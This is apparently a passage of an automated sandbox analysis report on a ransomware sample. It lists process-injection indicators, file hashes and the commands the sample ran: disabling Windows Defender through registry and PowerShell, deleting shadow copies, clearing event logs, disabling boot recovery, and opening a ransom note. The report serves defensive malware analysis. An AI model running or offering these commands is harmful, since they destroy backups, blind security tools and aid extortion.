Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1748 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1348 wrote to memory of 580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1348 wrote to memory of 580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1348 wrote to memory of 580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1160 wrote to memory of 1568 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1160 wrote to memory of 1568 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1160 wrote to memory of 1568 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 560 wrote to memory of 824 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 560 wrote to memory of 824 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 560 wrote to memory of 824 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1516 wrote to memory of 1300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1516 wrote to memory of 1300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1516 wrote to memory of 1300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1988 wrote to memory of 1032 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1988 wrote to memory of 1032 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1988 wrote to memory of 1032 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1712 wrote to memory of 1144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1712 wrote to memory of 1144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1712 wrote to memory of 1144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 2028 wrote to memory of 1692 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2028 wrote to memory of 1692 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2028 wrote to memory of 1692 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1420 wrote to memory of 1008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1420 wrote to memory of 1008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1420 wrote to memory of 1008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe

"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\wbzc_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1

Network

N/A

Files

memory/1348-54-0x0000000000000000-mapping.dmp

memory/580-55-0x0000000000000000-mapping.dmp

memory/1160-56-0x0000000000000000-mapping.dmp

memory/1568-57-0x0000000000000000-mapping.dmp

memory/560-58-0x0000000000000000-mapping.dmp

memory/824-59-0x0000000000000000-mapping.dmp

memory/1516-60-0x0000000000000000-mapping.dmp

memory/1300-61-0x0000000000000000-mapping.dmp

memory/1988-62-0x0000000000000000-mapping.dmp

memory/1032-63-0x0000000000000000-mapping.dmp

memory/1712-64-0x0000000000000000-mapping.dmp

memory/1144-65-0x0000000000000000-mapping.dmp

memory/2028-66-0x0000000000000000-mapping.dmp

memory/1692-67-0x0000000000000000-mapping.dmp

memory/1420-68-0x0000000000000000-mapping.dmp

memory/1008-69-0x0000000000000000-mapping.dmp

memory/1656-70-0x0000000000000000-mapping.dmp

memory/1304-71-0x0000000000000000-mapping.dmp

memory/1968-72-0x0000000000000000-mapping.dmp

memory/1952-73-0x0000000000000000-mapping.dmp

memory/636-74-0x0000000000000000-mapping.dmp

memory/896-75-0x0000000000000000-mapping.dmp

memory/1664-76-0x0000000000000000-mapping.dmp

memory/1688-77-0x0000000000000000-mapping.dmp

memory/1284-78-0x0000000000000000-mapping.dmp

memory/1636-79-0x0000000000000000-mapping.dmp

memory/584-80-0x0000000000000000-mapping.dmp

memory/548-81-0x0000000000000000-mapping.dmp

memory/1384-82-0x0000000000000000-mapping.dmp

memory/1824-83-0x0000000000000000-mapping.dmp

memory/1300-84-0x0000000000000000-mapping.dmp

memory/1028-85-0x0000000000000000-mapping.dmp

memory/1120-86-0x0000000000000000-mapping.dmp

memory/860-87-0x0000000000000000-mapping.dmp

memory/848-88-0x0000000000000000-mapping.dmp

memory/1452-89-0x0000000000000000-mapping.dmp

memory/1484-90-0x0000000000000000-mapping.dmp

memory/2040-91-0x0000000000000000-mapping.dmp

memory/684-92-0x0000000000000000-mapping.dmp

memory/1064-93-0x0000000000000000-mapping.dmp

memory/1708-94-0x0000000000000000-mapping.dmp

memory/1280-95-0x0000000000000000-mapping.dmp

memory/1556-96-0x0000000000000000-mapping.dmp

memory/368-97-0x0000000000000000-mapping.dmp

memory/1588-98-0x0000000000000000-mapping.dmp

memory/284-99-0x0000000000000000-mapping.dmp

memory/1056-100-0x0000000000000000-mapping.dmp

memory/1936-101-0x0000000000000000-mapping.dmp

memory/1356-102-0x0000000000000000-mapping.dmp

memory/1956-103-0x0000000000000000-mapping.dmp

memory/1644-104-0x0000000000000000-mapping.dmp

memory/1576-105-0x0000000000000000-mapping.dmp

memory/1168-106-0x0000000000000000-mapping.dmp

memory/1552-107-0x0000000000000000-mapping.dmp

memory/520-108-0x0000000000000000-mapping.dmp

memory/1820-109-0x0000000000000000-mapping.dmp

memory/828-110-0x0000000000000000-mapping.dmp

memory/1052-111-0x0000000000000000-mapping.dmp

memory/1800-112-0x0000000000000000-mapping.dmp

memory/1800-113-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp

memory/904-114-0x0000000000000000-mapping.dmp

memory/572-116-0x0000000000000000-mapping.dmp

memory/1832-118-0x0000000000000000-mapping.dmp

memory/1792-119-0x0000000000000000-mapping.dmp

memory/1724-120-0x0000000000000000-mapping.dmp

memory/108-122-0x000007FEF2CD0000-0x000007FEF382D000-memory.dmp

memory/108-123-0x00000000023D0000-0x00000000023D2000-memory.dmp

memory/108-125-0x00000000023D4000-0x00000000023D7000-memory.dmp

memory/108-124-0x00000000023D2000-0x00000000023D4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 02c407da2f40abf4360451a9267406bb
SHA1 df883e6533a6e78ef1ce8017299d5403375917e7
SHA256 21d8e477dd0abe67dfd55baa0759492f5164b113c8c1151d69ddc791ed2f4475
SHA512 eeebd3cbb4435c458ff046d23961f712c84ebb1fd7f624ce938f5da3001dbe411dbe1a3981770f0b487dc53cca24418c1a7c451d1df96429edbf1954fef8e79e

memory/108-127-0x00000000023DB000-0x00000000023FA000-memory.dmp

memory/2096-129-0x000007FEF2330000-0x000007FEF2E8D000-memory.dmp

memory/2096-130-0x0000000002820000-0x0000000002822000-memory.dmp

memory/2096-131-0x0000000002822000-0x0000000002824000-memory.dmp

memory/2096-132-0x0000000002824000-0x0000000002827000-memory.dmp

memory/2096-133-0x000000000282B000-0x000000000284A000-memory.dmp

C:\wbzc_HOW_TO_DECRYPT.txt

MD5 94140f86ecb9d062265eac7b7795646a
SHA1 3db5ede5d02c592e82133318f404592b4b547288
SHA256 542850d1bc9b7db0628229dd0fcf63deea399a04ab395f02261a76fd6a29ab60
SHA512 5a85cb40cc4235080064e09a0f32be259d00cb5308868c76a09dbb596386a17a864b65fca60366eba91a886e422ca45a7441b45a27ca40f564473b6d656da543